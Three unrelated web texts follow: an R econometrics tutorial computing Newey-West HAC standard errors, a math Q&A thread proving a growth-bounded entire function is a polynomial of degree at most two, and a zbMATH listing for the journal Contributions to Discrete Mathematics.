Consider the distributed lag regression model with no lags and a single regressor $X_t$ \begin{align*} Y_t = \beta_0 + \beta_1 X_t + u_t, \end{align*} with autocorrelated errors. A brief derivation of \begin{align} \overset{\sim}{\sigma}^2_{\widehat{\beta}_1} = \widehat{\sigma}^2_{\widehat{\beta}_1} \widehat{f}_t \tag{15.4} \end{align} the so-called Newey-West variance estimator for the variance of the OLS estimator of $\beta_1$, is presented in Chapter 15.4 of the book. $\widehat{\sigma}^2_{\widehat{\beta}_1}$ in (15.4) is the heteroskedasticity-robust variance estimate of $\widehat{\beta}_1$ and \begin{align} \widehat{f}_t = 1 + 2 \sum_{j=1}^{m-1} \left(\frac{m-j}{m}\right) \overset{\sim}{\rho}_j \tag{15.5} \end{align} is a correction factor that adjusts for serially correlated errors and involves estimates of $m-1$ autocorrelation coefficients $\overset{\sim}{\rho}_j$. As it turns out, using the sample autocorrelation as implemented in acf() to estimate the autocorrelation coefficients renders (15.4) inconsistent; see pp. 650-651 of the book for a detailed argument. Therefore, we use a somewhat different estimator. For a time series $X$ we have $\ \overset{\sim}{\rho}_j = \frac{\sum_{t=j+1}^T \hat v_t \hat v_{t-j}}{\sum_{t=1}^T \hat v_t^2}, \ \text{with} \ \hat v_t = (X_t-\overline{X}) \hat u_t.$ We implement this estimator in the function acf_c() below.
$m$ in (15.5) is a truncation parameter to be chosen. A rule of thumb for choosing $m$ is \begin{align} m = \left \lceil{0.75 \cdot T^{1/3}}\right\rceil. \tag{15.6} \end{align}
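As a quick cross-check of the rule of thumb (15.6), here is a plain-Python sketch (my illustration, not code from the book; the function name `rule_of_thumb_m` is mine — note also that the R snippet later in this section rounds down with floor(), which gives $m = 3$ for $T = 100$, whereas (15.6) as printed uses the ceiling):

```python
import math

def rule_of_thumb_m(T):
    # truncation parameter from equation (15.6): m = ceil(0.75 * T^(1/3))
    return math.ceil(0.75 * T ** (1 / 3))

print(rule_of_thumb_m(100))   # 4  (0.75 * 100^(1/3) ≈ 3.48)
print(rule_of_thumb_m(1000))  # 8  (0.75 * 1000^(1/3) ≈ 7.5)
```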
We simulate a time series that, as stated above, follows a distributed lag model with autocorrelated errors and then show how to compute the Newey-West HAC estimate of $SE(\widehat{\beta}_1)$ using R. This is done via two separate but, as we will see, identical approaches: at first we follow the derivation presented in the book step-by-step and compute the estimate “manually”. We then show that the result is exactly the estimate obtained when using the function NeweyWest().
# function that computes rho tilde
# (Lag() below is not base R; it comes from an attached package such as 'quantmod')
acf_c <- function(x, j) {
return(
t(x[-c(1:j)]) %*% na.omit(Lag(x, j)) / t(x) %*% x
)
}
# simulate time series with serially correlated errors
set.seed(1)
N <- 100
eps <- arima.sim(n = N, model = list(ma = 0.5))
X <- runif(N, 1, 10)
Y <- 0.5 * X + eps
# compute OLS residuals
res <- lm(Y ~ X)\$res
# compute v
v <- (X - mean(X)) * res
# compute robust estimate of beta_1 variance
var_beta_hat <- 1/N * (1/(N-2) * sum((X - mean(X))^2 * res^2) ) /
(1/N * sum((X - mean(X))^2))^2
# rule of thumb truncation parameter
m <- floor(0.75 * N^(1/3))
# compute correction factor
f_hat_T <- 1 + 2 * sum(
(m - 1:(m-1))/m * sapply(1:(m - 1), function(i) acf_c(x = v, j = i))
)
# compute Newey-West HAC estimate of the standard error
sqrt(var_beta_hat * f_hat_T)
#> [1] 0.04036208
For the code to be reusable in other applications, we use sapply() to estimate the $m-1$ autocorrelations $\overset{\sim}{\rho}_j$.
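The correction factor itself can also be sketched language-agnostically. Here is a minimal pure-Python version of the modified autocorrelation estimator and of equation (15.5) (an illustration of mine; the function names `rho_tilde` and `newey_west_factor` are not from the book):

```python
def rho_tilde(v, j):
    # modified autocorrelation estimator: sum_{t=j+1}^T v_t v_{t-j} / sum_t v_t^2
    # (v is the series v_t = (X_t - X_bar) * u_hat_t, 0-indexed here)
    num = sum(v[t] * v[t - j] for t in range(j, len(v)))
    den = sum(x * x for x in v)
    return num / den

def newey_west_factor(v, m):
    # correction factor f_hat of equation (15.5) with truncation parameter m
    return 1 + 2 * sum((m - j) / m * rho_tilde(v, j) for j in range(1, m))

# tiny worked example: v = [1, 2, 3, 4], m = 2
# rho_tilde(v, 1) = (1*2 + 2*3 + 3*4) / (1 + 4 + 9 + 16) = 20/30
f = newey_west_factor([1.0, 2.0, 3.0, 4.0], 2)
print(round(f, 4))  # 1 + 2 * (1/2) * (20/30) = 5/3, prints 1.6667
```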
# Using NeweyWest():
NW_VCOV <- NeweyWest(lm(Y ~ X),
lag = m - 1, prewhite = F,
adjust = T)
# compute standard error
sqrt(diag(NW_VCOV))[2]
#> X
#> 0.04036208
By choosing lag = m-1 we ensure that the maximum order of autocorrelations used is $m-1$ — just as in equation (15.5). Notice that we set the arguments prewhite = F and adjust = T to ensure that the formula (15.4) is used and finite sample adjustments are made.
We find that the computed standard errors coincide. Of course, a variance-covariance matrix estimate as computed by NeweyWest() can be supplied as the argument vcov in coeftest() such that HAC $t$-statistics and $p$-values are provided by the latter.
example_mod <- lm(Y ~ X)
coeftest(example_mod, vcov = NW_VCOV)
#>
#> t test of coefficients:
#>
#> Estimate Std. Error t value Pr(>|t|)
#> (Intercept) 0.542310 0.235423 2.3036 0.02336 *
#> X 0.423305 0.040362 10.4877 < 2e-16 ***
#> ---
#> Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1
### References
Newey, Whitney K., and Kenneth D. West. 1987. “A Simple, Positive Semi-Definite, Heteroskedasticity and Autocorrelation Consistent Covariance Matrix.” Econometrica 55 (3): 703–08.
# If $f$ is entire such that $|f(z)|\leq C|z|^{5/2}$, $f$ is a polynomial of degree at most two.
$$f$$ is entire and there exist $$C>0$$ and $$M>0$$ such that $$|f(z)|\leq C|z|^{5/2}$$ for all $$z\in\mathbb{C}$$ with $$|z|>M$$. Prove that $$f$$ is a polynomial of degree at most two.
I don't have a clear idea, but given an entire function we can bound it, $$\dfrac{|f(z)|}{|z|^{5/2}}\leq C$$, and showing that it has a removable singularity at $$z=0$$, using Riemann's theorem, I can show that $$\dfrac{f(z)}{z^{5/2}}$$ is a constant by Liouville's theorem. However, I'm not sure what I should do to show that it is in fact a polynomial.
• No! $f(z)/z^{5/2}$ is not a holomorphic function in $\Bbb C\setminus\{0\}$. – David C. Ullrich Dec 21 '18 at 18:09
• Cauchy's Estimate – Story123 Dec 21 '18 at 18:54
Almost certainly, the author of this exercise expected you to use Cauchy's estimates: $$\frac{|f^{(n)}(a)|}{n!}\le\frac{\sup_t |f(a+re^{it})|}{r^n}$$ for $$r>0$$. Here, then, $$\frac{|f^{(n)}(0)|}{n!}\le\frac{Cr^{5/2}}{r^n}$$ for $$r>M$$. If $$n\ge3$$ and we let $$r\to\infty$$ we get $$f^{(n)}(0)=0$$. In the power series $$f(z)=\sum a_nz^n$$ then $$a_3=a_4=\cdots=0$$.
• Two questions. Why are we considering $a+re^{it}$? What is $a$ here? And, how do we get the supremum $Mr^{5/2}$? – Ya G Dec 21 '18 at 20:24
• @YaG That's three questions! $a+re^{it}$ is the circle, centre $a$, radius $r$. $a=0$ in your problem. The supremum comes from your condition on $f$. – Lord Shark the Unknown Dec 22 '18 at 5:56
Let $$f(z) = \sum_{n=0}^\infty a_n z^n$$, and let $$g(z) = \sum_{k=0}^\infty a_{k+3} z^k$$, so that $$[f(z) - a_0 - a_1 z - a_2 z^2] = z^3 g(z).$$ The function $$g$$ is entire and, by assumption, $$\lim_{|z| \to +\infty} g(z) = 0$$: $$|g(z)| = \frac{|f(z) - a_0 - a_1 z - a_2 z^2|}{|z|^{5/2}} \cdot \frac{1}{|z|^{1/2}} \leq \left(C + \frac{|a_0| + |a_1|\, |z| + |a_2|\, |z|^2}{|z|^{5/2}}\right)\frac{1}{|z|^{1/2}} \to 0.$$ Hence, by Liouville's theorem, we must have $$g = 0$$.
• Would you please explain a little bit more? This does make sense by itself but how did you come up with the $g(z)$ other than the fact that to make a relation to $f(z)$ as you set it up. How is $|z|^{5/2}$ and $C$ used this this case? – Ya G Dec 21 '18 at 18:19
• Added a line in the proof. – Rigel Dec 21 '18 at 18:24
It may be interesting to note this follows from basic facts about Fourier series (Parseval) with more or less no complex analysis. Say $$f(z)=\sum c_nz^n$$. Then $$C^2r^5\ge\frac1{2\pi}\int_0^{2\pi}|f(re^{it})|^2\,dt=\sum_j|c_j|^2r^{2j}\ge|c_n|^2r^{2n};$$hence $$c_n=0$$ for $$n\ge3$$.
• A lot of complex analysis follows from basic facts about Fourier series. – Lord Shark the Unknown Dec 21 '18 at 18:55
Your approach can also be made to work, but you need to show that $$h(z)=\frac{f(z)}{z^3}$$ has a removable singularity at $$z=0$$.
This can be done as follows: Let $$g(z)=\frac{f(z)}{z^2}$$. Then, as $$\lim_{z \to 0}g(z)=0$$, $$g$$ has a removable singularity at $$z=0$$, and if we remove it we have $$g(0)=0$$.
Now since, after removing the singularity, $$g$$ is entire and $$g(0)=0$$, then $$h(z)=\frac{g(z)}{z}$$ also has a removable singularity at $$0$$.
Then $$h$$ becomes an entire function and $$\lim_{z \to \infty} h(z)=0$$. From here it is easy to conclude that $$h$$ is constant.
# zbMATH — the first resource for mathematics
## Contributions to Discrete Mathematics
Short Title: Contrib. Discrete Math. Publisher: University of Calgary, Calgary, AB ISSN: 1715-0868/e Online: http://cdm.ucalgary.ca/cdm/index.php/cdm/issue/archive; https://cdm.ucalgary.ca/issue/archive Comments: Indexed cover-to-cover; Published electronic only as of Vol. 1 (2006). This journal is available open access.
Documents Indexed: 290 Publications (since 2006) References Indexed: 94 Publications with 1,467 References.
#### Latest Issues
16, No. 2 (2021) 16, No. 1 (2021) 15, No. 3 (2020) 15, No. 2 (2020) 15, No. 1 (2020) 14, No. 1 (2019) 13, No. 2 (2018) 13, No. 1 (2018) 12, No. 2 (2017) 12, No. 1 (2017) 11, No. 2 (2017) 11, No. 1 (2016) 10, No. 2 (2015) 10, No. 1 (2015) 9, No. 2 (2014) 9, No. 1 (2014) 8, No. 2 (2013) 8, No. 1 (2013) 7, No. 2 (2012) 7, No. 1 (2012) 6, No. 2 (2011) 6, No. 1 (2011) 5, No. 2 (2010) 5, No. 1 (2010) 4, No. 2 (2009) 4, No. 1 (2009) 3, No. 2 (2008) 3, No. 1 (2008) 2, No. 2 (2007) 2, No. 1 (2007) 1, No. 1 (2006)
#### Authors
8 Bonato, Anthony 6 Tao, Terence 5 Pouzet, Maurice 4 Gionfriddo, Mario 4 Ille, Pierre 4 MacGillivray, Gary 4 Merca, Mircea 3 Goyal, Megha 3 Korchmáros, Gábor 3 Milici, Salvatore 3 Prałat, Paweł 3 Si-Kaddour, Hamza 3 Spirova, Margarita Georgieva 3 Szőnyi, Tamás 3 Woodrow, Robert E. 3 Yao, Olivia Xiang Mei 3 Zhou, Sizhong 2 Aguglia, Angela 2 Andres, Stephan Dominique 2 Berman, Leah Wrenn 2 Bilge, Doǧan 2 Bonacini, Paola 2 Bose, Prosenjit K. 2 Boussairi, Abderrahim 2 Chu, Wenchang 2 Coskey, Samuel 2 Cossidente, Antonio 2 Dujmović, Vida 2 El Bachraoui, Mohamed 2 Fink, Alex 2 Galeana-Sánchez, Hortensia 2 Gordinowicz, Przemysław 2 Grünbaum, Branko 2 Guy, Richard Kenneth 2 Hemmecke, Raymond 2 Henning, Michael Anthony 2 Hubička, Jan 2 Jahn, Thomas 2 Juricevic, Robert 2 Kamiński, Marcin Marek 2 Kathiresan, Kumarappan 2 Kawamura, Kazuhiro 2 Kiss, György 2 Kochol, Martin 2 Konečný, Matěj 2 Laflamme, Claude 2 Maity, Dipendu 2 Marcugini, Stefano 2 Marino, Lucia 2 Mellinger, Keith E. 2 Messinger, Margaret-Ellen 2 Mixer, Mark 2 Napolitano, Vito 2 Naszódi, Márton 2 O’reilly-Regueiro, Eugenia 2 Pambianco, Fernanda 2 Qi, Feng 2 Rana, Meenakshi 2 Samadi, Babak 2 Sauer, Norbert W. 2 Scheidler, Renate 2 Sun, Zhiren 2 Tawbe, Khalil 2 Thomas, Robert S. D. 2 Tripodi, Antoinette 2 Upadhyay, Ashish Kumar 2 Vega, Oscar 2 Volkmann, Lutz 2 Vuillon, Laurent 2 Wang, Changping 2 Witte Morris, Dave 2 Wood, David Ronald 2 Zaguia, Imed 2 Zaker, Manouchehr 1 Aaghabali, Mehdi 1 Abatangelo, Vito 1 Abreu, Marién 1 Adamaszek, Michal 1 Agarwal, Ashok Kumar 1 Agustín-Aquino, Octavio A. 1 Akbari, Saieed 1 Akbary, Amir 1 Alfakih, Abdo Y. 1 Aliev, Iskander M. 1 Alikhani, Saeid 1 Alipour, Sharareh 1 Allagan, Julian D. 1 Alsairafi, Alyeah 1 Anholcer, Marcin 1 Anusha Devi, P. 1 Aranda, Andrés 1 Arce-Nazario, Rafael A. 1 Arezoomand, Majid 1 Ariannejad, Masoud 1 Ashraf, Mohammad 1 Attarzadeh, Fatemeh 1 Avelino, Catarina Pina 1 Bača, Martin 1 Bahadir, Selim 1 Bailey, Robert F. ...and 354 more Authors
#### Fields
198 Combinatorics (05-XX) 52 Convex and discrete geometry (52-XX) 50 Number theory (11-XX) 37 Geometry (51-XX) 20 Group theory and generalizations (20-XX) 16 Order, lattices, ordered algebraic structures (06-XX) 12 Computer science (68-XX) 11 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 10 Mathematical logic and foundations (03-XX) 9 Information and communication theory, circuits (94-XX) 7 General topology (54-XX) 6 Operations research, mathematical programming (90-XX) 5 Linear and multilinear algebra; matrix theory (15-XX) 5 Special functions (33-XX) 5 Dynamical systems and ergodic theory (37-XX) 5 Functional analysis (46-XX) 5 Algebraic topology (55-XX) 4 Commutative algebra (13-XX) 3 General and overarching topics; collections (00-XX) 3 Algebraic geometry (14-XX) 3 Topological groups, Lie groups (22-XX) 2 History and biography (01-XX) 2 Associative rings and algebras (16-XX) 2 Manifolds and cell complexes (57-XX) 2 Numerical analysis (65-XX) 2 Mechanics of particles and systems (70-XX) 1 General algebraic systems (08-XX) 1 Nonassociative rings and algebras (17-XX) 1 Real functions (26-XX) 1 Functions of a complex variable (30-XX) 1 Probability theory and stochastic processes (60-XX) 1 Statistics (62-XX)
#### Citations contained in zbMATH Open
151 Publications have been cited 555 times in 523 Documents.
Coloring edges and vertices of graphs without short or long cycles. Zbl 1188.05065
2007
The sum-product phenomenon in arbitrary rings. Zbl 1250.11011
Tao, Terence
2009
Szemerédi’s regularity lemma revisited. Zbl 1093.05030
Tao, Terence
2006
The distribution of polynomials over finite fields, with applications to the Gowers norms. Zbl 1225.11017
Green, Ben; Tao, Terence
2009
Diagonal recurrence relations for the Stirling numbers of the first kind. Zbl 1360.11051
Qi, Feng
2016
Freiman’s theorem for solvable groups. Zbl 1332.11015
Tao, Terence
2010
An improved bound on the number of point-surface incidences in three dimensions. Zbl 1317.52022
Zahl, Joshua
2013
On geometric constructions of $$(k,g)$$-graphs. Zbl 1203.05076
Gács, András; Héger, Tamás
2008
Expanding polynomials over finite fields of large characteristic, and a regularity lemma for definable sets. Zbl 1370.11135
Tao, Terence
2015
The cop density of a graph. Zbl 1203.05131
Bonato, Anthony; Hahn, Geňa; Wang, Changping
2007
The search for N-e.c. Graphs. Zbl 1203.05138
Bonato, Anthony
2009
Characterizations and algorithms for generalized cops and robbers games. Zbl 1376.05087
Bonato, Anthony; MacGillivray, Gary
2017
Polytopes derived from sporadic simple groups. Zbl 1320.51021
Hartley, Michael Ian; Hulpke, Alexander
2010
Affinely regular polygons in an affine plane. Zbl 1193.51011
Korchmáros, Gábor; Szőnyi, Tamás
2008
Injective and non-injective realizations with symmetry. Zbl 1189.52021
Schulze, Bernd
2010
Sum and product of different sets. Zbl 1134.11008
Chang, Mei-Chu
2006
LC reductions yield isomorphic simplicial complexes. Zbl 1191.52011
Matoušek, Jiří
2008
On the universal rigidity of generic bar frameworks. Zbl 1189.52020
Alfakih, Abdo Y.
2010
The cops and robber game on graphs with forbidden (induced) subgraphs. Zbl 1317.05121
Joret, Gwenaël; Kamiński, Marcin; Theis, Dirk Oliver
2010
Claw-freeness, 3-homogeneous subsets of a graph and a reconstruction problem. Zbl 1317.05127
Pouzet, Maurice; Kaddour, Hamza Si; Trotignon, Nicolas
2011
Algorithms for classifying regular polytopes with a fixed automorphism group. Zbl 1317.51019
Leemans, Dimitri; Mixer, Mark
2012
Elements of finite order in automorphism groups of homogeneous structures. Zbl 1321.20003
Bilge, Doǧan; Melleray, Julien
2013
On primitive symmetric association schemes with $$m_1=3$$. Zbl 1093.05073
Bannai, Eiichi; Bannai, Etsuko
2006
A survey on semiovals. Zbl 1206.51008
Kiss, György
2008
Fold and Mycielskian on homomorphism complexes. Zbl 1247.55003
Csorba, Péter
2008
Partially critical tournaments and partially critical supports. Zbl 1318.05031
Sayar, Mohamed Y.
2011
On the minimum order of $$k$$-cop-win graphs. Zbl 1317.05118
Baird, William; Beveridge, Andrew; Bonato, Anthony; Codenotti, Paolo; Maurer, Aaron; McCauley, John; Valeva, Silviya
2014
Constructions of small complete arcs with prescribed symmetry. Zbl 1189.51007
Lisoněk, Petr; Marcugini, Stefano; Pambianco, Fernanda
2008
Fractional illumination of convex bodies. Zbl 1189.52005
Naszódi, Márton
2009
Closing the gap: eternal domination on $$3 \times n$$ grids. Zbl 1376.05114
Messinger, Margaret-Ellen
2017
Generalized CPR-graphs and applications. Zbl 1320.51024
Pellicer, Daniel; Weiss, Asia Ivić
2010
The rigidity of periodic frameworks as graphs on a fixed torus. Zbl 1317.52028
Ross, Elissa
2014
Interlacement in 4-regular graphs: a new approach using nonsymmetric matrices. Zbl 1317.05092
Traldi, Lorenzo
2014
New combinatorial interpretations of some Rogers-Ramanujan type identities. Zbl 1365.05015
Goyal, Megha
2017
Some remarks on the lonely runner conjecture. Zbl 1451.11088
Tao, Terence
2018
Partially critical indecomposable graphs. Zbl 1188.05099
Breiner, Andrew; Deogun, Jitender; Ille, Pierre
2008
Weakly partitive families on infinite sets. Zbl 1203.05013
Ille, Pierre; Woodrow, Robert
2009
Computing holes in semi-groups and its applications to transportation problems. Zbl 1203.90115
Hemmecke, Raymond; Takemura, Akimichi; Yoshida, Ruriko
2009
On bisectors in normed planes. Zbl 1352.46015
Jahn, Thomas; Spirova, Margarita
2015
Cones of partial metrics. Zbl 1323.51004
Deza, Michel; Deza, Elena
2011
A bijection between noncrossing and nonnesting partitions of types A, B and C. Zbl 1317.05022
Mamede, Ricardo
2011
Quasi-Hermitian varieties in $$PG(r,q^2)$$, $$q$$ even. Zbl 1317.51005
Aguglia, Angela
2013
An inductive construction of $$(2,1)$$-tight graphs. Zbl 1317.52027
Nixon, Anthony; Owen, John C.
2014
A short construction of highly chromatic digraphs without short cycles. Zbl 1317.05079
Severino, Michael
2014
Face module for realizable $$\mathbb{Z}$$-matroids. Zbl 1435.05044
Martino, Ivan
2018
Closed formulas and identities on the Bell polynomials and falling factorials. Zbl 1471.11102
Qi, Feng; Niu, Da-Wei; Lim, Dongkyu; Guo, Bai-Ni
2020
Arcs in desarguesian nets. Zbl 1204.51010
Beato, Annalisa; Faina, Giorgio; Giulietti, Massimo
2008
On universally rigid frameworks on the line. Zbl 1344.52013
Jordán, Tibor; Viet Hang Nguyen
2015
Automorphisms of circulants that respect partitions. Zbl 1341.05215
Morris, Joy
2016
Barnes-type Boole polynomials. Zbl 1360.11055
Kim, Dae San; Kim, Taekyun
2016
Group irregular labelings of disconnected graphs. Zbl 1376.05133
Anholcer, Marcin; Cichacz-Przenioslo, Sylwia
2017
Signed $$b$$-matchings and $$b$$-edge covers of strong product graphs. Zbl 1317.05156
Wang, Changping
2010
Homotopy types of independence complexes of forests. Zbl 1317.05037
Kawamura, Kazuhiro
2010
Option-closed games. Zbl 1367.91043
Nowakowski, Richard J.; Ottaway, Paul
2011
Strong $$d$$-collapsibility. Zbl 1317.05198
Tancer, Martin
2011
On characterizing game-perfect graphs by forbidden induced subgraphs. Zbl 1317.05045
Andres, Stephan Dominique
2012
2-generated Cayley digraphs on nilpotent groups have Hamiltonian paths. Zbl 1317.05074
Morris, Dave Witte
2012
The exact maximal energy of integral circulant graphs with prime power order. Zbl 1317.05114
Sander, Jürgen W.; Sander, Torsten
2013
On the order of appearance of product of consecutive Fibonacci numbers. Zbl 1443.11014
Khaochim, Narissara; Pongsriiam, Prapanpong
2018
The complexity of power graphs associated with finite groups. Zbl 07032112
Kirkland, Steve; Moghaddamfar, Ali Reza; Salehy, S. Navid; Salehy, S. Nima; Zohouratar, Mahsa
2018
Latin squares and their Bruhat order. Zbl 1445.05021
Fernandes, Rosário; da Cruz, Henrique F.; Salomão, Domingos
2020
Minimum size blocking sets of certain line sets with respect to an elliptic quadric in $$\mathrm{PG}(3,q)$$. Zbl 1467.51008
De Bruyn, Bart; Pradhan, Puspendu; Sahoo, Binod Kumar
2020
$$N$$-free extensions of posets. Note on a theorem of P. A. Grillet. Zbl 1097.06002
Pouzet, Maurice; Zaguia, Nejib
2006
On the oriented chromatic number of dense graphs. Zbl 1203.05061
Wood, David R.
2007
Explicit upper bounds for $$f(n)=\prod_{p_{\omega(n)}} \frac{p}{p-1}$$. Zbl 1242.11069
Akbary, Amir; Friggstad, Zachary; Juricevic, Robert
2007
Bounds on the f-vectors of tight spans. Zbl 1204.52013
Joswig, Michael; Herrmann, Sven
2007
Priestley duality for some algebras with a negation operator. Zbl 1187.06008
Celani, Sergio A.
2007
A complete span of $$\mathcal H(4,4)$$ admitting $$PSL_2(11)$$ and related structures. Zbl 1193.51012
Cossidente, Antonio; Ebert, Gary L.; Marino, Giuseppe
2008
Configurations graphs of neighbourhood geometries. Zbl 1258.05084
Abreu, Marien; Funk, Martin; Labbate, Domenico; Napolitano, Vito
2008
Colourful transversal theorems. Zbl 1204.52010
Oliveros, Deborah; Montejano, Luis
2008
$$\{-1,2\}$$-hypomorphy and hereditary hypomorphy coincide for posets. Zbl 1203.05102
2009
A characterization of the base-matroids of a graphic matroid. Zbl 1203.05029
Maffioli, Francesco; Salvi, Norma Zagaglia
2010
A theorem on fractional ID-$$(g,f)$$-factor-critical graphs. Zbl 1341.05217
Zhou, Sizhong; Sun, Zhiren; Xu, Yang
2015
A lower bound for radio $$k$$-chromatic number of an arbitrary graph. Zbl 1341.05109
Kola, Srinivasa Rao; Panigrahi, Pratima
2015
The annihilating-ideal graph of $$\mathbb{Z}_n$$ is weakly perfect. Zbl 1341.05124
Nikandish, Reza; Maimani, Hamidreza; Izanloo, Hasan
2016
Sun toughness and $$P_{\geq3}$$-factors in graphs. Zbl 1444.05115
Zhou, Sizhong
2019
Distinguishing number and distinguishing index of neighbourhood corona of two graphs. Zbl 1444.05051
Alikhani, Saeid; Soltani, Samaneh
2019
Generating special arithmetic functions by Lambert series factorizations. Zbl 1470.11008
Merca, Mircea; Schmidt, Maxie Dion
2019
Bounds on several versions of restrained domination number. Zbl 1376.05115
2017
On combinatorial extensions of Rogers-Ramanujan type identities. Zbl 1376.05005
Goyal, Megha
2017
On chromatic number of general Kneser graphs. Zbl 1376.05045
Alipour, Sharareh; Jafari, Amir
2017
Bounds for the $$m$$-eternal domination number of a graph. Zbl 1376.05112
Henning, Michael A.; Klostermeyer, William F.; MacGillivray, Gary
2017
Split $$(n + t)$$-color partitions and 2-color $$F$$-partitions. Zbl 1376.05012
Rana, Meenakshi; Sareen, J. K.
2017
Internal and external duality in abstract polytopes. Zbl 06820596
Cunningham, Gabe; Mixer, Mark
2017
Bounds and constructions for $$n$$-e.c. tournaments. Zbl 1317.05160
Bonato, Anthony; Gordinowicz, Przemysław; Prałat, Paweł
2010
Signed star $$k$$-domatic number of a graph. Zbl 1317.05142
Sheikholeslami, Seyed Mahmoud; Volkmann, Lutz
2011
Notes on the illumination parameters of convex bodies. Zbl 1317.52006
Kiss, György; de Wet, Pieter Oloff
2012
Deformations of associahedra and visibility graphs. Zbl 1317.52018
Devadoss, Satyan L.; Shah, Rahul; Shao, Xuancheng; Winston, Ezra
2012
Determination of the prime bound of a graph. Zbl 1317.05135
Boussaïri, Abderrahim; Ille, Pierre
2014
On cycle packings and feedback vertex sets. Zbl 1317.05147
Chappell, Glenn G.; Gimbel, John; Hartman, Chris
2014
On uniformly resolvable $$\{K_2, p_k\}$$-designs with $$k=3,4$$. Zbl 1327.05034
Gionfriddo, Mario; Milici, Salvatore
2015
On the enumeration of a class of toroidal graphs. Zbl 1387.52029
2018
Loose Hamiltonian cycles forced by large $$(k-2)$$-degree – sharp version. Zbl 1409.05142
de Oliveira Bastos, Josefran; Mota, Guilherme Oliveira; Schacht, Mathias; Schnitzer, Jakob; Schulenburg, Fabian
2018
Small on-line Ramsey numbers – a new approach. Zbl 1406.05108
Gordinowicz, Przemysław; Prałat, Paweł
2018
Arrangements of homothets of a convex body. II. Zbl 1410.52014
2018
Construction of strongly regular graphs having an automorphism group of composite order. Zbl 07232870
Crnković, Dean; Maksimović, Marija
2020
On parity and recurrences for certain partition functions. Zbl 1445.05016
Nyirenda, Darlison
2020
3-uniform hypergraphs: modular decomposition and realization by tournaments. Zbl 1447.05144
Boussaïri, Abderrahim; Chergui, Brahim; Ille, Pierre; Zaidi, Mohamed
2020
Best simultaneous Diophantine approximations under a constraint on the denominator. Zbl 1139.11031
Aliev, Iskander; Gruber, Peter
2006
Induced subgraphs of bounded degree and bounded treewidth. Zbl 1092.05033
Bose, Prosenjit; Dujmović, Vida; Wood, David R.
2006
Canonical functions: a proof via topological dynamics. Zbl 07406819
Pinsker, Michael; Bodirsky, Manuel
2021
Lengths of extremal square-free ternary words. Zbl 1467.68149
2021
A survey of graph burning. Zbl 1457.05068
Bonato, Anthony
2021
Closed formulas and identities on the Bell polynomials and falling factorials. Zbl 1471.11102
Qi, Feng; Niu, Da-Wei; Lim, Dongkyu; Guo, Bai-Ni
2020
Latin squares and their Bruhat order. Zbl 1445.05021
Fernandes, Rosário; da Cruz, Henrique F.; Salomão, Domingos
2020
Minimum size blocking sets of certain line sets with respect to an elliptic quadric in $$\mathrm{PG}(3,q)$$. Zbl 1467.51008
De Bruyn, Bart; Pradhan, Puspendu; Sahoo, Binod Kumar
2020
On the illumination of a class of convex bodies. Zbl 1453.52005
Wu, Senlin; Zhou, Ying
2019
A wide class of combinatorial matrices related with reciprocal Pascal and super Catalan matrices. Zbl 1452.15020
Kilic, Emrah; Prodinger, Helmut
2019
Feedback vertex number of Sierpiński-type graphs. Zbl 1444.05074
Yuan, Lili; Wu, Baoyindureng; Zhao, Biao
2019
Some remarks on the lonely runner conjecture. Zbl 1451.11088
Tao, Terence
2018
Face module for realizable $$\mathbb{Z}$$-matroids. Zbl 1435.05044
Martino, Ivan
2018
On the order of appearance of product of consecutive Fibonacci numbers. Zbl 1443.11014
Khaochim, Narissara; Pongsriiam, Prapanpong
2018
The complexity of power graphs associated with finite groups. Zbl 07032112
Kirkland, Steve; Moghaddamfar, Ali Reza; Salehy, S. Navid; Salehy, S. Nima; Zohouratar, Mahsa
2018
String C-groups of order 1024. Zbl 1398.20032
Gomi, Yasushi; Loyola, Mark; De Las Peñas, Ma. Louise Antonette
2018
A characterization of well-founded algebraic lattices. Zbl 06859434
Chakir, Ilham; Pouzet, Maurice
2018
Characterizations and algorithms for generalized cops and robbers games. Zbl 1376.05087
Bonato, Anthony; MacGillivray, Gary
2017
Closing the gap: eternal domination on $$3 \times n$$ grids. Zbl 1376.05114
Messinger, Margaret-Ellen
2017
New combinatorial interpretations of some Rogers-Ramanujan type identities. Zbl 1365.05015
Goyal, Megha
2017
Group irregular labelings of disconnected graphs. Zbl 1376.05133
Anholcer, Marcin; Cichacz-Przenioslo, Sylwia
2017
Geometric algorithms for minimal enclosing disks in strictly convex normed planes. Zbl 1380.90218
Jahn, Thomas
2017
Independence complexes and incidence graphs. Zbl 1376.05105
Tsukuda, Shuichi
2017
The conjugacy problem for automorphism groups of homogeneous digraphs. Zbl 06820572
Coskey, Samuel; Ellis, Paul
2017
Comments on the golden partition conjecture. Zbl 1378.06001
Peczarski, Marcin Piotr
2017
Conjectures on uniquely 3-edge-colorable graphs. Zbl 1376.05059
Matsumoto, Naoki
2017
The non-existence of distance-2 ovoids in $$\mathsf{H}(q)^{(D)}$$. Zbl 1381.51002
Bishnoi, Anurag; Ihringer, Ferdinand
2017
Lower bounds on the distance domination number of a graph. Zbl 1376.05108
Davila, Randy Ryan; Fast, Caleb; Henning, Michael A.; Kenter, Franklin
2017
Shellability, vertex decomposability, and lexicographical products of graphs. Zbl 1376.05171
van der Meulen, Kevin N.; van Tuyl, Adam
2017
Contractions of polygons in abstract polytopes. I. Zbl 1368.52007
Scheidwasser, Ilya
2017
Diagonal recurrence relations for the Stirling numbers of the first kind. Zbl 1360.11051
Qi, Feng
2016
Automorphisms of circulants that respect partitions. Zbl 1341.05215
Morris, Joy
2016
Barnes-type Boole polynomials. Zbl 1360.11055
Kim, Dae San; Kim, Taekyun
2016
Distinct values of bilinear forms on algebraic curves. Zbl 1342.52019
Valculescu, Claudiu; De Zeeuw, Frank
2016
Expanding polynomials over finite fields of large characteristic, and a regularity lemma for definable sets. Zbl 1370.11135
Tao, Terence
2015
On bisectors in normed planes. Zbl 1352.46015
Jahn, Thomas; Spirova, Margarita
2015
On universally rigid frameworks on the line. Zbl 1344.52013
Jordán, Tibor; Viet Hang Nguyen
2015
On the chromatic index of Latin squares. Zbl 1341.05017
Cavenagh, Nicholas J.; Kuhl, Jaromy
2015
A curious polynomial interpolation of Carlitz-Riordan’s $$q$$-ballot numbers. Zbl 1327.05011
Chapoton, Frédéric; Zeng, Jiang
2015
On the minimum order of $$k$$-cop-win graphs. Zbl 1317.05118
Baird, William; Beveridge, Andrew; Bonato, Anthony; Codenotti, Paolo; Maurer, Aaron; McCauley, John; Valeva, Silviya
2014
